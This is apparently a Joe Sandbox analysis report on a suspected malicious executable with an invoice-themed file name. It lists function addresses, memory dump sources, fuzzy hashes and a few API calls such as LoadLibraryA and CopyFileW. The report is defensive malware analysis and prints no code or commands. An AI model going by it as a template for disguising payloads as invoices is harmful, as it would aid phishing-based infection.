Associated: 00000000.00000002.546071087.0000000000EE0000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f6ffc1ffb33035c276010529a8aa5856f10abb77bb6f5f1aa5c112bc312e5e5
Instruction ID: 1f4aaf0a78529c880c0a5cc989cb5388351447cfe2d9fbc283ea7921d8389bf6
Opcode Fuzzy Hash: 8f6ffc1ffb33035c276010529a8aa5856f10abb77bb6f5f1aa5c112bc312e5e5
Instruction Fuzzy Hash: 81E08634D1020CAFCB04EFE4E4557EDBBF4EB84304F2005AA8904A7350EB316E55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0580 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.546171259.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.546071087.0000000000EE0000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ee54ab5f42b45b858e23e4e2c169bd8c40d7afc3da48bd118cb9fd360502708
Instruction ID: 79c8f06c957d140b837f3ad18c06359453c1988224ea5305608afdcad57b3461
Opcode Fuzzy Hash: 4ee54ab5f42b45b858e23e4e2c169bd8c40d7afc3da48bd118cb9fd360502708
Instruction Fuzzy Hash: 24E0B674911208EFCB50DFA8D58569DBFF4EB08305F6005AAD909A7360E631AE54CB41

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E395D8 Relevance: .4, Instructions: 397COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9251024f55f59b04835e0d9f9b023c440489300fd37a50dba71416c3cf1e0316
Instruction ID: 06f2c51230db77ece0b5cc6d6f1deca35b75157dff1d6e23497f783f69c936c5
Opcode Fuzzy Hash: 9251024f55f59b04835e0d9f9b023c440489300fd37a50dba71416c3cf1e0316
Instruction Fuzzy Hash: 9D02F275A00218DFDB15CFA9C984E99BBB2FF49304F1590A9E909AB332DB31D991DF10

Uniqueness

Uniqueness Score: -1.00%

Function 00E395C9 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.545474035.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f072f72c607c4aa47b1627763d0d0890679667ed632242f67593ec31d6669a0b
Instruction ID: 31e95bf06a46c6ac20348090ac54549fe1740e89c7fed4ee5565fb13e1e78d2b
Opcode Fuzzy Hash: f072f72c607c4aa47b1627763d0d0890679667ed632242f67593ec31d6669a0b
Instruction Fuzzy Hash: 4951C675E052188FDB14CFA6D944ADDBBF6AF89300F14D1AAD809BB355EB305A45CF10

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: P90GT_Invoice_Related_Property_Tax_P800.exePID: 6608, Parent PID: 6532COMMON

Execution Graph

Execution Coverage:	13.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	122
Total number of Limit Nodes:	11

Executed Functions

Function 06400048 Relevance: 34.4, Strings: 27, Instructions: 662
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xP5l, xrefs: 06400C0E
xP5l, xrefs: 06400A5E
xP5l, xrefs: 064009F2
xP5l, xrefs: 06400B00
xP5l, xrefs: 06400A28
xP5l, xrefs: 06400B36
xP5l, xrefs: 0640080C
xP5l, xrefs: 06400734
xP5l, xrefs: 06400878
xP5l, xrefs: 0640091A
xP5l, xrefs: 064008E4
xP5l, xrefs: 064007A0
xP5l, xrefs: 06400ACA
xP5l, xrefs: 06400A94
xP5l, xrefs: 064008AE
xP5l, xrefs: 0640076A
xP5l, xrefs: 06400CB0
xP5l, xrefs: 06400BA2
xP5l, xrefs: 06400842
xP5l, xrefs: 06400BD8
xP5l, xrefs: 06400986
xP5l, xrefs: 06400950
xP5l, xrefs: 064009BC
xP5l, xrefs: 06400C44
xP5l, xrefs: 06400B6C
xP5l, xrefs: 064007D6
xP5l, xrefs: 06400C7A

Memory Dump Source

Source File: 00000001.00000002.462685146.0000000006400000.00000040.00000800.00020000.00000000.sdmp, Offset: 06400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6400000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID: xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l$xP5l
API String ID: 0-683077171
Opcode ID: e6e225d4576f933460607f56f5982ca00539b42143c320ac85a6227517a140e9
Instruction ID: 16335306af56ae2b37d017580e26f5ac807dae3867dadb865ded87c76fc9c0c2
Opcode Fuzzy Hash: e6e225d4576f933460607f56f5982ca00539b42143c320ac85a6227517a140e9
Instruction Fuzzy Hash: 5B4249307046208FCB24AF64D450AAEB6E2FFC2718B42491DE6439F794CB75E959CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0596F5BC Relevance: 1.6, APIs: 1, Instructions: 95
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 0596F692

Memory Dump Source

Source File: 00000001.00000002.462407392.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c7b19579931679b33740704d3c9e3a6ffe4aab5e38a369cb96440a0004a26080
Instruction ID: 46bcf846dfb6530390a171be4da638b36ca4ccaa0c8efd80ca2615bf8cf2452e
Opcode Fuzzy Hash: c7b19579931679b33740704d3c9e3a6ffe4aab5e38a369cb96440a0004a26080
Instruction Fuzzy Hash: 8F3142B0D0424D9FCB24CFA8D845B9EBBF5FB08314F10852AE815A7394D774944ACF92

Uniqueness

Uniqueness Score: -1.00%

Function 0596D104 Relevance: 1.6, APIs: 1, Instructions: 89
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 0596F692

Memory Dump Source

Source File: 00000001.00000002.462407392.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 10e797d38b9de6d236545e619aeaebc600903791dd8234a70123cb1815c2ed47
Instruction ID: 26907aff4b58fd23ef40072a11a255cec54b9684009fbc39ea9933ffaa44c597
Opcode Fuzzy Hash: 10e797d38b9de6d236545e619aeaebc600903791dd8234a70123cb1815c2ed47
Instruction Fuzzy Hash: 9C3134B0D0424D9FDB14DFA8D888B9EBBF5FB08314F10852AE816A7394D774944ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 0596A3C3 Relevance: 1.6, APIs: 1, Instructions: 75
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyFileW.KERNEL32(?,00000000,?), ref: 0596A461

Memory Dump Source

Source File: 00000001.00000002.462407392.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 9c597d0e7105aa810f1aa68ac80a1bf124ca7f21ca0f363bb2c716ec2a4e4a50
Instruction ID: c27371468bf9649da8e967d722372a4eb0d7f363888e81382b272fabc112b3c7
Opcode Fuzzy Hash: 9c597d0e7105aa810f1aa68ac80a1bf124ca7f21ca0f363bb2c716ec2a4e4a50
Instruction Fuzzy Hash: F53129B1C012199FCB10CFA9D8847DEBBF4EF48320F15816AE858AB244D7349945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05967934 Relevance: 1.6, APIs: 1, Instructions: 75
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyFileW.KERNEL32(?,00000000,?), ref: 0596A461

Memory Dump Source

Source File: 00000001.00000002.462407392.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5960000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 9b33c32b3e2b82da3811c6bc943637a0f1e8ff7f0f37ccf4ee30a45ba8888a6b
Instruction ID: 92ef609e6a0e39465f9b6ba981754f08dc78669f7e5947cf126e22679fb31585
Opcode Fuzzy Hash: 9b33c32b3e2b82da3811c6bc943637a0f1e8ff7f0f37ccf4ee30a45ba8888a6b
Instruction Fuzzy Hash: 3A312CB1C052199FCB10CF99D8847EEBBF4EF48310F158169E915B7241D7749944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DB08E0 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNEL32 ref: 02DB0947

Memory Dump Source

Source File: 00000001.00000002.453963593.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2db0000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 2fa99b22d4e620d6acb6cc3be13a3dee8fb5ec7a0c9131905f02ed7d6b07211d
Instruction ID: 611bd27701880a8067c4a367784cee7bad12104fe78b538d269e9cfe6d85accb
Opcode Fuzzy Hash: 2fa99b22d4e620d6acb6cc3be13a3dee8fb5ec7a0c9131905f02ed7d6b07211d
Instruction Fuzzy Hash: 581149719043098FDB20DFAAC4447DFFBF4AF49228F248459D525A7300CB386945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02DB08E8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 02DB0947

Memory Dump Source

Source File: 00000001.00000002.453963593.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2db0000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 36cb971fd71f5f690365f190d0ad43a42c82d6f7ba044be6ea933095c7395c65
Instruction ID: 43ae05dac584d9361eca4a3d3432214db0f56e001534483a649884b2873bd1f3
Opcode Fuzzy Hash: 36cb971fd71f5f690365f190d0ad43a42c82d6f7ba044be6ea933095c7395c65
Instruction Fuzzy Hash: BB11F5719043098BDB20DFAAC8447DFBBF4AF48268F24841AD529A7340CB79A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06401538 Relevance: 1.4, Instructions: 1414COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.462685146.0000000006400000.00000040.00000800.00020000.00000000.sdmp, Offset: 06400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6400000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed24d70e1d2d4a8228667259352611a6e5dbb9a2f23029fe09b4910700e6752c
Instruction ID: 52fb2fcf2a06513f0a1a57276ca1dc1fbf1492de0df88473d30b0d0407b8688b
Opcode Fuzzy Hash: ed24d70e1d2d4a8228667259352611a6e5dbb9a2f23029fe09b4910700e6752c
Instruction Fuzzy Hash: 7CC26C74B042189FDB55DB64C990EAEB7B2FF49304F11809AE609AB3A1CB71ED81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06402A68 Relevance: .6, Instructions: 558COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.462685146.0000000006400000.00000040.00000800.00020000.00000000.sdmp, Offset: 06400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6400000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6467892d3423048082dd68bb282925d0d6bf97a16cdd166d38abf7e643409b73
Instruction ID: a941c4d511aa8dc42248bf836529134d7db8315fad5ffc04323830b3907f37c8
Opcode Fuzzy Hash: 6467892d3423048082dd68bb282925d0d6bf97a16cdd166d38abf7e643409b73
Instruction Fuzzy Hash: E8222A35B002148FDB04DFA9C884DAEBBF6EF89704B15809AE606DB3A5CB71ED45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 06401517 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.462685146.0000000006400000.00000040.00000800.00020000.00000000.sdmp, Offset: 06400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6400000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 746287f3f28822423d450901d0fdd5c7432dfd2c365004230792c3ceeb6f5e78
Instruction ID: cfe2c2359d0709a85e403c8af93436d5e0b968d3d14d5c05d465d3cdf67a2b04
Opcode Fuzzy Hash: 746287f3f28822423d450901d0fdd5c7432dfd2c365004230792c3ceeb6f5e78
Instruction Fuzzy Hash: C8C1D334B10204AFDB498F94CA94E9DB7B7FF49704B61805AEA05AB7A5CB72EC41CB11

Uniqueness

Uniqueness Score: -1.00%

Function 06400042 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.462685146.0000000006400000.00000040.00000800.00020000.00000000.sdmp, Offset: 06400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6400000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0321c838242beaad3a4783575a3df532fe9b05ebe99a30b1c18c498d65c9bdf0
Instruction ID: d04d034b20aee46085911684265faaff5d432bfdeab0e9b856b2e431664029d6
Opcode Fuzzy Hash: 0321c838242beaad3a4783575a3df532fe9b05ebe99a30b1c18c498d65c9bdf0
Instruction Fuzzy Hash: D4C18C30B04224DFEB55AFA4D990B6E77F2EF85B04F11806AE6019F3A5CBB1D845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06403DE0 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.462685146.0000000006400000.00000040.00000800.00020000.00000000.sdmp, Offset: 06400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6400000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bb4e2329abb9e312f98c888dce1956e6954fd1fc954da4232c03eb44bc7611
Instruction ID: 3f79712ee8a43e5d51a31efd127ee4d42ff569aefc646330368d0523331b92da
Opcode Fuzzy Hash: 24bb4e2329abb9e312f98c888dce1956e6954fd1fc954da4232c03eb44bc7611
Instruction Fuzzy Hash: 5B91AF34B102159FCB45CF69D884EAABBF6FF89314B1580AAE905DB3A1CB31EC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 06401190 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.462685146.0000000006400000.00000040.00000800.00020000.00000000.sdmp, Offset: 06400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6400000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fa9f433dca3f72bc1a7bd83d2c0402104ce0fb3ab746cd283a34bd3e681d937
Instruction ID: ee333e12ac2bdba240ab3847b92edee038ba637293a135013159adb2fee7a773
Opcode Fuzzy Hash: 8fa9f433dca3f72bc1a7bd83d2c0402104ce0fb3ab746cd283a34bd3e681d937
Instruction Fuzzy Hash: E5512536B043548FEB55AAB9D8404ABBBE6AFC6310718817FD946CB791EB30C845C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 064028B8 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.462685146.0000000006400000.00000040.00000800.00020000.00000000.sdmp, Offset: 06400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6400000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3898a3ba9b372b89e5d21a1963faf03021284b4224026d23a3c8bddfe76d6573
Instruction ID: e33ce961d3a87188c0e09eb1b4929bcc683defad29d3e04141e162a777216891
Opcode Fuzzy Hash: 3898a3ba9b372b89e5d21a1963faf03021284b4224026d23a3c8bddfe76d6573
Instruction Fuzzy Hash: AF513735B102149FCB54CF69C88499EBBB2FF89314B15806AF905AB3A1DB71ED05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 064040B0 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.462685146.0000000006400000.00000040.00000800.00020000.00000000.sdmp, Offset: 06400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6400000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 571d35fb4cfca3f8dab8af6a5287eff2b83d5ffd39007fd1702e8fe9918c2386
Instruction ID: 4c66bad5064a01a5f03cbabf3a50a9b694b45de9246bdd305c6980b72ea39fa2
Opcode Fuzzy Hash: 571d35fb4cfca3f8dab8af6a5287eff2b83d5ffd39007fd1702e8fe9918c2386
Instruction Fuzzy Hash: B0519034B042059FDB00CF79D885DAABBF2EF89300B55849AE605DB3A2CB31EC45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0640408F Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.462685146.0000000006400000.00000040.00000800.00020000.00000000.sdmp, Offset: 06400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6400000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b539379873b9d35372e41cd6489488f4a1d4c18dc702b3523d019489499ccf9
Instruction ID: 840b9da14a23e3efe2dea641b0bb7e5c2abe83486b9e73572dae28d320a453f7
Opcode Fuzzy Hash: 8b539379873b9d35372e41cd6489488f4a1d4c18dc702b3523d019489499ccf9
Instruction Fuzzy Hash: B9417D35B042059FDB01CF68D985EAABBF2FF89310B5580AAE604DB7A2C731EC45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 064030C8 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.462685146.0000000006400000.00000040.00000800.00020000.00000000.sdmp, Offset: 06400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6400000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc310a72d32abb4f89db608f5420259b4e84b3f98d8f5f6e38c5bd5aa58b9ba2
Instruction ID: cbc38d6af5c4f497a53b9b10fa341cada8d0ed49771acc7bcd59e2471e5170cd
Opcode Fuzzy Hash: cc310a72d32abb4f89db608f5420259b4e84b3f98d8f5f6e38c5bd5aa58b9ba2
Instruction Fuzzy Hash: 3D41F234B001148FCB54DF69C9989AEBBB6FF8C714B11406AEA06DB3A1CB31ED44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 06403228 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.462685146.0000000006400000.00000040.00000800.00020000.00000000.sdmp, Offset: 06400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6400000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f0efa8093c56507be4786dff2ad7ebe72053fa777ddcb8892b85dd91bf1927a
Instruction ID: 3f1dab362b010883471840951032131a292d70ed07f5ce80a3301a418d0c68cd
Opcode Fuzzy Hash: 7f0efa8093c56507be4786dff2ad7ebe72053fa777ddcb8892b85dd91bf1927a
Instruction Fuzzy Hash: C041E435B001148FCB54DF69C9889AEBBB6FF88714B51406AEA06DB3A1CA31EC448B60

Uniqueness

Uniqueness Score: -1.00%

Function 064030AB Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.462685146.0000000006400000.00000040.00000800.00020000.00000000.sdmp, Offset: 06400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6400000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeecefc4ded462ea3f8fe7c488eca124ff7a8f3ec37b2c51af7a3ca4fa17d768
Instruction ID: 66b8678fa8c0192f058dc0421bfffbaead9f84a69e70842f12780d3fe12e21cb
Opcode Fuzzy Hash: eeecefc4ded462ea3f8fe7c488eca124ff7a8f3ec37b2c51af7a3ca4fa17d768
Instruction Fuzzy Hash: 26316C35B042148FDB45DF78C9988ADBBB2FF88310715406AE906DB3A1DB31EC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 010FD054 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.451519277.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10fd000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f34178683eb3c26a6ea43748cbb3045d262946af20cf39c5f6ae00875f0659b3
Instruction ID: ce5586bcf7309db656e9dcb45633e6f3b87fbe8ad8eaa26d00a6e1c9d3cb0f5d
Opcode Fuzzy Hash: f34178683eb3c26a6ea43748cbb3045d262946af20cf39c5f6ae00875f0659b3
Instruction Fuzzy Hash: 602128B1504240EFCF15DF54D8C1B2ABBA5FB88314F24C6ADEB494B646C33AD856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 010FD5E0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.451519277.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10fd000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 078dea696a377ea138ac3d2a34c3f229afc3308cd830b64b9190b93ecd05608c
Instruction ID: 6c5408e1d87766a5739ca4b38de63170063b3bf9cfbd161f37db385263d6eff7
Opcode Fuzzy Hash: 078dea696a377ea138ac3d2a34c3f229afc3308cd830b64b9190b93ecd05608c
Instruction Fuzzy Hash: 272125B1504240DFDB05DF94D9C1B2ABFA5FB8C328F2485ADEA494B646C336D845CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 010FD4F4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.451519277.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10fd000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a1e1e376c8e2efef4e5a89f60efa35d9da8d73634c60a8377573da1cd5bc96e
Instruction ID: 4bdb8b2c56f9b0ebc3fd60aafe5f1cae0d4b7b79b602d58a21e3c86f680af41a
Opcode Fuzzy Hash: 8a1e1e376c8e2efef4e5a89f60efa35d9da8d73634c60a8377573da1cd5bc96e
Instruction Fuzzy Hash: 74216AB1504200DFCB01DF54C8C4F2ABFA5FB88718F2485ADEA454B606C336D845CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0110D2C4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.451667039.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_110d000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61af61a667c26471acbb18d60b42f286e41c5376f47dcb37dec7a022080defa7
Instruction ID: 05b90149dafee5ac649d70045f2c6cbd3f547bbb6d26521c65b6cf50d1eb711e
Opcode Fuzzy Hash: 61af61a667c26471acbb18d60b42f286e41c5376f47dcb37dec7a022080defa7
Instruction Fuzzy Hash: B7213EF5908240DFDF0ADF94E5C0B26BB65FB84324F25C56DD8054F286C77AD445CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0110D474 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.451667039.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_110d000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9236b0fc08e57c1abfe45f7be5c7e2610ca8d11eaf84b266213b2405ecf08c89
Instruction ID: 30642dfc0a72b98c529a97c7464c2e611a14347022fb2a3e98fa161f571f89d3
Opcode Fuzzy Hash: 9236b0fc08e57c1abfe45f7be5c7e2610ca8d11eaf84b266213b2405ecf08c89
Instruction Fuzzy Hash: 1B21F871A04200DFDF0ADF94E5C0B26BB75FB84318F24C56DE9098B686C777E845CA62

Uniqueness

Uniqueness Score: -1.00%

Function 010FD04F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.451519277.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10fd000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 915b1cc9285727c7c66ebaaea4b346aa1b0c242c952c6e540ef3e95bc218b3a6
Instruction ID: a14d995f75c06a23318e5146b58eadb075f5e94b3a2d43479e39dfc3d51b37f4
Opcode Fuzzy Hash: 915b1cc9285727c7c66ebaaea4b346aa1b0c242c952c6e540ef3e95bc218b3a6
Instruction Fuzzy Hash: 49219D76404280DFCF16CF54D9C5B16BFB2FB88314F2886A9DA480B616C33AD466CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010FD5DB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.451519277.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10fd000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47076947d0cae9de72b912d4314ccf217260e82977345402d4a79466876f1438
Instruction ID: bf78dee7ecdd47af300d1d620c1b515f9fd1bf8de9e11ff8ea04e4f723d5c90b
Opcode Fuzzy Hash: 47076947d0cae9de72b912d4314ccf217260e82977345402d4a79466876f1438
Instruction Fuzzy Hash: BB11AF76504280CFDB12DF54D9C4B16BFB1FB88324F2486ADD9484B617C336D45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 010FD4EF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.451519277.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10fd000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47076947d0cae9de72b912d4314ccf217260e82977345402d4a79466876f1438
Instruction ID: bb896059d59c0bb1099092071dc1fa831f229a266f26dcd06726d076445f4e7d
Opcode Fuzzy Hash: 47076947d0cae9de72b912d4314ccf217260e82977345402d4a79466876f1438
Instruction Fuzzy Hash: A811B176404280CFCB12CF54D9C4B16BFB2FB84728F2486ADD9450BA16C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0110D2BF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.451667039.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_110d000_P90GT_Invoice_Related_Property_Tax_P800.jbxd

Similarity

API ID:
String ID:
API String ID:
